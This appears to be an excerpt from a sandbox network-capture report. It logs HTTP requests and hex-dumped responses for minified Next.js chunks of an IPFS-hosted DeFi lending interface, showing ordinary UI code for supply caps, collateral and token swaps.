                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreialy2r3eqsvrivdf7w7a5srgyd6gx2ba6gzgfrnuoxwodbhrxundu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1497.8e36954048946218.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreialy2r3eqsvrivdf7w7a5srgyd6gx2ba6gzgfrnuoxwodbhrxundu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98742
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 63 39 65 62 36 34 33 31 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40c9eb64313-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1307INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 39 37 5d 2c 7b 39 34 36 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4e 49 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 67 4b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 70 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 46 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 69 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 56 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 79 49 3a 66 75
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1497],{94671:function(e,t,n){n.d(t,{NI:function(){return r},gK:function(){return s},pQ:function(){return o},Fi:function(){return i},iv:function(){return c},Vc:function(){return l},yI:fu
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 5f 45 4e 41 42 4c 45 44 3a 75 2e 7a 2e 44 49 53 41 42 4c 45 44 3a 69 26 26 28 73 3d 75 2e 7a 2e 55 4e 41 56 41 49 4c 41 42 4c 45 5f 44 55 45 5f 54 4f 5f 49 53 4f 4c 41 54 49 4f 4e 29 3a 73 3d 69 3f 75 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 44 49 53 41 42 4c 45 44 3a 75 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 45 4e 41 42 4c 45 44 3a 73 3d 6e 3f 75 2e 7a 2e 55 4e 41 56 41 49 4c 41 42 4c 45 5f 44 55 45 5f 54 4f 5f 49 53 4f 4c 41 54 49 4f 4e 3a 6f 3f 65 2e 75 73 61 67 65 41 73 43 6f 6c 6c 61 74 65 72 61 6c 45 6e 61 62 6c 65 64 4f 6e 55 73 65 72 3f 75 2e 7a 2e 45 4e 41 42 4c 45 44 3a 75 2e 7a 2e 44 49 53 41 42 4c 45 44 3a 75 2e 7a 2e 45 4e 41 42 4c 45 44 2c 73 7d 7d 2c 37 34 31 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 77 5f 3a 66
                                                                                                                                                                                                                                                  Data Ascii: _ENABLED:u.z.DISABLED:i&&(s=u.z.UNAVAILABLE_DUE_TO_ISOLATION):s=i?u.z.ISOLATED_DISABLED:u.z.ISOLATED_ENABLED:s=n?u.z.UNAVAILABLE_DUE_TO_ISOLATION:o?e.usageAsCollateralEnabledOnUser?u.z.ENABLED:u.z.DISABLED:u.z.ENABLED,s}},74119:function(e,t,n){n.d(t,{w_:f
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 65 67 65 78 3a 2f 5e 41 6d 6f 75 6e 74 20 5c 64 2b 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 20 74 6f 20 70 72 6f 63 65 65 64 24 2f 2c 6d 65 73 73 61 67 65 3a 22 41 6d 6f 75 6e 74 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 2e 20 50 6c 65 61 73 65 20 74 72 79 20 6c 61 72 67 65 72 20 61 6d 6f 75 6e 74 2e 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 65 20 69 6e 20 76 3f 76 5b 65 5d 3a 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 68 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 67 65 78 2e 74 65 73 74 28 65 29 7d 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6d 65 73 73 61 67 65 29 7c 7c 22 54 68 65 72 65 20 77 61 73 20 61 6e 20 69 73 73 75 65 20 66 65 74 63
                                                                                                                                                                                                                                                  Data Ascii: egex:/^Amount \d+ is too small to proceed$/,message:"Amount is too small. Please try larger amount."}];function g(e){var t;return e in v?v[e]:(null===(t=h.find((function(t){return t.regex.test(e)})))||void 0===t?void 0:t.message)||"There was an issue fetc
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 2c 6e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 6e 2e 64 65 63 69 6d 61 6c 73 2c 61 2c 63 29 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 65 2e 73 65 6e 74 29 3b 63 61 73 65 20 39 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 2c 6e 2c 72 2c 61 2c 75 29 7b 72 65 74 75 72 6e 20 79 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 72 65 74 75 72 6e 28 79 3d 28 30 2c 61 2e 5a 29 28 6f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 72 2c 61 2c
                                                                                                                                                                                                                                                  Data Ascii: ,n.underlyingAsset,n.decimals,a,c);case 8:return e.abrupt("return",e.sent);case 9:case"end":return e.stop()}}),e)})))).apply(this,arguments)}function b(e,t,n,r,a,u){return y.apply(this,arguments)}function y(){return(y=(0,a.Z)(o().mark((function e(t,n,r,a,
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 29 7b 76 61 72 20 6c 3b 72 65 74 75 72 6e 20 6f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 32 2c 74 2e 67 65 74 52 61 74 65 28 7b 61 6d 6f 75 6e 74 3a 6e 2c 73 72 63 54 6f 6b 65 6e 3a 72 2c 73 72 63 44 65 63 69 6d 61 6c 73 3a 61 2c 64 65 73 74 54 6f 6b 65 6e 3a 75 2c 64 65 73 74 44 65 63 69 6d 61 6c 73 3a 73 2c 75 73 65 72 41 64 64 72 65 73 73 3a 69 2c 73 69 64 65 3a 6d 2e 50 43 2e 53 45 4c 4c 2c 6f 70 74 69 6f 6e 73 3a 63 7d 29 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 6c 3d 65 2e 73 65 6e 74 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6c 29 3b 63 61 73 65 20 34 3a 63 61
                                                                                                                                                                                                                                                  Data Ascii: ){var l;return o().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.next=2,t.getRate({amount:n,srcToken:r,srcDecimals:a,destToken:u,destDecimals:s,userAddress:i,side:m.PC.SELL,options:c});case 2:return l=e.sent,e.abrupt("return",l);case 4:ca
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1107INData Raw: 72 6e 22 2c 6c 29 3b 63 61 73 65 20 34 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 61 2c 75 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 61 2e 5a 29 28 6f 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 61 2c 75 2c 73 2c 69 2c 63 2c 6c 29 7b 76 61 72 20 70 2c 64 3b 72 65 74 75 72 6e 20 6f 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74
                                                                                                                                                                                                                                                  Data Ascii: rn",l);case 4:case"end":return e.stop()}}),e)})));return function(t,n,r,a,u,s,o){return e.apply(this,arguments)}}(),r=function(){var n=(0,a.Z)(o().mark((function n(r,a,u,s,i,c,l){var p,d;return o().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:ret


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.549727209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC739OUTGET /_next/static/chunks/9689.adbfca89f0e04259.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13906
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreib2se3lzdro7dhacacdyd4y6zce3tz5icgylijzbxm5ovmzsdl3yq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9689.adbfca89f0e04259.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreib2se3lzdro7dhacacdyd4y6zce3tz5icgylijzbxm5ovmzsdl3yq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 11527528
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 63 61 62 31 36 30 66 36 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40cab160f6d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1303INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 38 39 5d 2c 7b 38 31 39 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 6e 2e 64 28 74 2c 7b 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 75 70 70 6c 79 43 61 70 3d 22 73 75 70 70 6c 79 43 61 70 22 2c 65 2e 62 6f 72 72 6f 77 43 61 70 3d 22 62 6f 72 72 6f 77 43 61 70 22 7d 28 72 7c 7c 28 72 3d 7b 7d 29 29 7d 2c 32 35 30 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9689],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){ret
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 72 6f 77 20 63 61 70 20 69 73 20 72 65 61 63 68 65 64 2e 22 7d 29 3b 72 65 74 75 72 6e 28 30 2c 63 2e 6a 73 78 29 28 69 2e 47 2c 75 28 75 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 72 7d 29 29 7d 7d 2c 32 35 39 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 61 3d 6e 28 34 39 35 30 31 29 2c 73 3d 6e 28 33 30 31 32 30 29 2c 69 3d 6e 28 39 31 36 35 35 29 2c 63 3d 6e 28 37 30 37 39 34 29 2c 6c 3d 6e 28 35 37 36 30 39 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 75 3d 6e 28 35 38 35 32 37 29 2c 64 3d 6e 28 38 35 38 39 33 29 2c 78 3d 5b 22 6c 6f 61 64 69 6e 67 22 2c 22 6f
                                                                                                                                                                                                                                                  Data Ascii: row cap is reached."});return(0,c.jsx)(i.G,u(u({},n),{},{children:r}))}},25935:function(e,t,n){n.d(t,{B:function(){return m}});var r=n(59499),o=n(4730),a=n(49501),s=n(30120),i=n(91655),c=n(70794),l=n(57609),p=n(41024),u=n(58527),d=n(85893),x=["loading","o
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 65 73 3a 7b 30 3a 74 3f 28 30 2c 64 2e 6a 73 78 29 28 69 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 31 32 2c 77 69 64 74 68 3a 32 35 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6d 61 72 67 69 6e 4c 65 66 74 3a 22 34 70 78 22 7d 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 70 2e 42 2c 7b 76 61 6c 75 65 3a 62 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 73 78 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 22 34 70 78 22 2c 63 6f 6c 6f 72 3a 66 3f 22 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 22 3a 22 75 6e
                                                                                                                                                                                                                                                  Data Ascii: es:{0:t?(0,d.jsx)(i.Z,{variant:"rectangular",height:12,width:25,sx:{borderRadius:"4px",display:"flex",marginLeft:"4px"}}):(0,d.jsx)(p.B,{value:b,visibleDecimals:2,variant:"secondary12",color:"text.secondary",sx:{marginLeft:"4px",color:f?"warning.main":"un
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6b 3d 66 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 6f 6e 43 68 61 6e 67 65 2c 72 3d 28 30 2c 6f 2e 5a 29 28 65 2c 50 29 3b 72 65 74 75 72 6e 28 30 2c 5a 2e 6a 73 78 29 28 76 2e 5a 2c 53 28 53 28 7b 7d 2c 72 29 2c 7b 7d 2c 7b 67 65 74 49 6e 70 75 74 52 65 66 3a 74 2c 6f 6e 56 61 6c 75 65 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 61 6c 75 65 21 3d 3d 65 2e 76 61 6c 75 65 26 26 6e 28 7b 74 61 72 67 65 74 3a 7b 6e 61 6d 65 3a 65 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 74 2e 76 61 6c 75 65 7c 7c 22 22 7d 7d 29 7d 2c 74
                                                                                                                                                                                                                                                  Data Ascii: Object.getOwnPropertyDescriptor(n,t))}))}return e}var k=f.forwardRef((function(e,t){var n=e.onChange,r=(0,o.Z)(e,P);return(0,Z.jsx)(v.Z,S(S({},r),{},{getInputRef:t,onValueChange:function(t){t.value!==e.value&&n({target:{name:e.name,value:t.value||""}})},t
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 63 75 73 3a 21 30 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 26 26 28 4e 75 6d 62 65 72 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 3e 4e 75 6d 62 65 72 28 49 29 3f 6f 28 22 2d 31 22 29 3a 6f 28 65 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 29 29 7d 2c 69 6e 70 75 74 50 72 6f 70 73 3a 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 61 6d 6f 75 6e 74 20 69 6e 70 75 74 22 2c 73 74 79 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 31 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 32 38 2c 30 31 70 78 22 2c 70 61 64 64 69 6e 67 3a 30 2c 68 65 69 67 68 74 3a 22 32 38 70 78 22 2c 74 65 78 74 4f 76 65 72 66 6c 6f 77 3a 22 65 6c 6c 69 70 73 69 73 22 2c 77 68 69 74 65 53 70 61 63 65 3a 22 6e 6f 77 72 61 70 22 2c 6f 76 65 72 66 6c 6f 77 3a 22
                                                                                                                                                                                                                                                  Data Ascii: cus:!0,onChange:function(e){o&&(Number(e.target.value)>Number(I)?o("-1"):o(e.target.value))},inputProps:{"aria-label":"amount input",style:{fontSize:"21px",lineHeight:"28,01px",padding:0,height:"28px",textOverflow:"ellipsis",whiteSpace:"nowrap",overflow:"
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 5a 2e 6a 73 78 29 28 77 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 74 2e 69 63 6f 6e 53 79 6d 62 6f 6c 7c 7c 74 2e 73 79 6d 62 6f 6c 2c 61 54 6f 6b 65 6e 3a 74 2e 61 54 6f 6b 65 6e 2c 73 78 3a 7b 6d 72 3a 32 2c 6d 6c 3a 34 7d 7d 29 2c 28 30 2c 5a 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 6d 61 69 6e 31 36 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 70 72 69 6d 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 5d 7d 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 4d 7c 7c 76 6f 69 64 20 30 2c 43 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 5a 2e 6a 73 78 29 28 79 2e 5a 2c 7b 76 61 6c 75 65 3a 65 2e 73 79 6d 62 6f 6c 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 73 73 65 74 73 53 65 6c
                                                                                                                                                                                                                                                  Data Ascii: ,children:[(0,Z.jsx)(w.T1,{symbol:t.iconSymbol||t.symbol,aToken:t.aToken,sx:{mr:2,ml:4}}),(0,Z.jsx)(l.Z,{variant:"main16",color:"text.primary",children:e})]})},children:[M||void 0,C.map((function(e){return(0,Z.jsx)(y.Z,{value:e.symbol,"data-cy":"assetsSel
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 74 2e 64 69 73 61 62 6c 65 64 22 7d 29 5d 7d 29 2c 21 76 26 26 28 30 2c 5a 2e 6a 73 78 29 28 62 2e 5a 2c 7b 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 30 2c 6d 6c 3a 22 37 70 78 22 2c 70 3a 30 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 42 26 26 48 28 42 2e 65 76 65 6e 74 4e 61 6d 65 2c 53 28 7b 7d 2c 42 2e 65 76 65 6e 74 50 61 72 61 6d 73 29 29 2c 6f 28 22 2d 31 22 29 7d 2c 64 69 73 61 62 6c 65 64 3a 66 7c 7c 44 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 5a 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 4d 61 78 22 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 46 26 26 28 30 2c 5a 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 7a 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                  Data Ascii: t.disabled"})]}),!v&&(0,Z.jsx)(b.Z,{size:"small",sx:{minWidth:0,ml:"7px",p:0},onClick:function(){B&&H(B.eventName,S({},B.eventParams)),o("-1")},disabled:f||D,children:(0,Z.jsx)(a.cC,{id:"Max"})})]})]}),F&&(0,Z.jsx)(c.Z,{sx:{background:z.palette.background
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 6d 2e 6a 73 78 73 29 28 73 2e 68 76 2c 7b 61 73 73 65 74 3a 42 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 45 2e 73 75 63 63 65 73 73 26 26 28 30 2c 6d 2e 6a 73 78 29 28 78 2e 45 2c 7b 74 69 74 6c 65 3a 67 2c 73 79 6d 62 6f 6c 3a 62 3f 76 6f 69 64 20 30 3a 4c 7d 29 2c 4e 26 26 21 77 26 26 28 30 2c 6d 2e 6a 73 78 29 28 68 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 28 30 2c 75 2e 4d 6f 29 28 5f 29 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 5f 2c 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 64 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 66 7d 7d 7d 29 2c 76 28 7b 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 4e 2c 6e 61 74 69 76 65 42 61
                                                                                                                                                                                                                                                  Data Ascii: .symbol;return(0,m.jsxs)(s.hv,{asset:B,children:[!E.success&&(0,m.jsx)(x.E,{title:g,symbol:b?void 0:L}),N&&!w&&(0,m.jsx)(h.I,{networkName:(0,u.Mo)(_).name,chainId:_,event:{eventName:d.vh.SWITCH_NETWORK,eventParams:{asset:f}}}),v({isWrongNetwork:N,nativeBa
